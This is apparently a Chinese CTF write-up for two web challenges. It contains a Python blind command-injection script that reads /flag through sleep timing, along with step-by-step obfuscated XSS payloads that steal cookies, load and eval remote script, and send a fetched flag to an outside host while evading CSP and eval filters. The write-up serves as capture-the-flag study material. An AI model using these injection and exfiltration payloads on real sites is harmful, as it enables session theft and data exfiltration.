Web-帮帮小红花
和i春秋圣诞赛的cut盲注类似,各种方法盲注flag即可,注意&要转义。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
| import string import requests proxies={"http":"http://127.0.0.1:4476"} pay = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}-_" result = "" while True: for i in pay: try: requests.get("http://183.129.189.60:10074/?imagin=grep \"^%s\" /flag %%26%%26 sleep 10"%(result+i),timeout=5,proxies=proxies) continue; except KeyboardInterrupt as e: exit(0) except: result+=i print(result) break;
|
Web-notes
源码提示leak
,访问www.zip
得到源码
1
| <body onpageshow=alert(1) >
|
子元素是body会被浏览器修补到body的属性里去,这样视同html>body有onpageshow属性
1 2 3 4 5 6 7
| <body onpageshow=window['location'].href=/111/ >
(/l/+1)[1]
<body onpageshow=window[(/l/+1)[1]+(/o/+1)[1]+(/c/+1)[1]+(/a/+1)[1]+(/t/+1)[1]+(/i/+1)[1]+(/o/+1)[1]+(/n/+1)[1]].href=(/h/+1)[1]+(/t/+1)[1]+(/t/+1)[1]+(/p/+1)[1]+(/:/+1)[1]+(/\//+1)[1]+(/\//+1)[1]+(/a/+1)[1]+(/p/+1)[1]+(/i/+1)[1]+(/./+1)[1]+(/c/+1)[1]+(/h/+1)[1]+(/a/+1)[1]+(/r/+1)[1]+(/a/+1)[1]+(/./+1)[1]+(/p/+1)[1]+(/u/+1)[1]+(/b/+1)[1]+(/\//+1)[1]+document[(/c/+1)[1]+(/o/+1)[1]+(/o/+1)[1]+(/k/+1)[1]+(/i/+1)[1]+(/e/+1)[1]] /> http:
|
限制url长度500,所以需要优化
1 2 3 4 5 6 7 8
| (/http:\/\/ctf.chara.pub\//+1).substring(1,25) (/l/+1)[1]+(/ocation/+1).substring(1,8) (/c/+1)[1]+(/ookies/+1).substring(1,7)
<body onpageshow=window[(/l/+1)[1]+(/ocation/+1).substring(1,8)].href=(/http:\/\/ctf.chara.pub\//+1).substring(1,25)+document[(/c/+1)[1]+(/ookie/+1).substring(1,6)] /> http:
|
可以打到admin的phpsessionid,但是没有用
1 2 3 4 5 6 7 8 9 10 11
| a=new XMLHttpRequest();a.open("GET","http://ctf.chara.pub",1);a.onreadystatechange=function(){eval(a.responseText)};a.send(null)
a=new XMLHttpRequest();a.open((/GET/+1).substring(1,4),(/http:\/\/ctf.chara.pub\//+1).substring(1,25),1);a.onreadystatechange (){eval(a.responseText)};a.send(null)
#过滤func,用lambda
(/r/+1)[1]+(/esponseText/+1).substring(1,12)
a=new XMLHttpRequest();a.open((/GET/+1).substring(1,4),(/http:\/\/ctf.chara.pub\//+1).substring(1,25),1);a.onreadystatechange=()=>{eval(a[(/r/+1)[1]+(/esponseText/+1).substring(1,12)])};a.send(null)
<body onpageshow=a=new XMLHttpRequest();a.open((/GET/+1).substring(1,4),(/http:\/\/ctf.chara.pub\//+1).substring(1,25),1);a.onreadystatechange=()=>{eval(a[(/r/+1)[1]+(/esponseText/+1).substring(1,12)])};a.send(null) />
|
csp不允许XMLHttpRequest访问外部地址,那剩下的方法就是getflag然后提交到用户名里
用户名限制格式,要么分段打payload,要么window.location.href
XMLHttpRequest需要一个空格来new,用fetch
1 2 3 4 5 6 7 8 9
| fetch("/lib/flag.php",{method:"GET"}).then((r)=>{r.text().then((r)=>{window.location.href="http://ctf.chara.pub/"+r})})
(/\/lib\/flag.php/+1).substring(2,16) (/\/lib\/f/+1).substring(2,9)+(/lag.php/+1).substring(1,8)
a=(/t/+1)[1]+(/hen/+1).substring(1,4);window[(/f/+1)[1]+(/etch/+1).substring(1,5)]((/\/lib\/f/+1).substring(2,9)+(/lag.php/+1).substring(1,8),{method:(/GET/+1).substring(1,4)})[a]((r)=>{r.text()[a]((r)=>{window[(/l/+1)[1]+(/ocation/+1).substring(1,8)].href=(/http:\/\/ctf.chara.pub\//+1).substring(1,25)+r})})
<body onpageshow=a=(/t/+1)[1]+(/hen/+1).substring(1,4);window[(/f/+1)[1]+(/etch/+1).substring(1,5)]((/\/lib\/f/+1).substring(2,9)+(/lag.php/+1).substring(1,8),{method:(/GET/+1).substring(1,4)})[a]((r)=>{r.text()[a]((r)=>{window[(/l/+1)[1]+(/ocation/+1).substring(1,8)].href=(/http:\/\/ctf.chara.pub\//+1).substring(1,25)+r})}) />
|
=>绕过
直接用eval构造字符串?
题目好像改过,现在的过滤了eval
1 2 3 4 5 6 7 8 9 10
| a=String.fromCharCode; b=(/fetch(12lib2flag.php1,{method:1GET1}).then((r)=3{r.text().then((r)=3{window.location.href=1http:22ctf.chara.pub21+r})})/+4).replace(/1/g,a(34)).replace(/2/g,a(47)).replace(/3/g,a(62)).substring(1,120);window[(/e/+1)[1]+(/val/+1).substring(1,4)](b)
#最后的payload <body onpageshow=a=String.fromCharCode;b=(/5etch(12lib25lag.php1,{method:1GET1}).th6n((r)=3{r.text().th6n((r)=3{window.l7cation.href=1http:22ctf.chara.pub21+r})})/+4).replace(/1/g,a(34)).replace(/2/g,a(47)).replace(/3/g,a(62)).replace(/5/g,a(102)).replace(/6/g,a(101)).replace(/7/g,a(111)).substring(1,120);window[(/e/+1)[1]+(/val/+1).substring(1,4)](b) />
http:
|
可能长度还是有点过(虽然自己测出来是499),用flask写个302可以打
由于Valine存在安全问题,我们不会记录您的IP地址。您所填入的内容,和您的User-Agent信息将明文公开存储。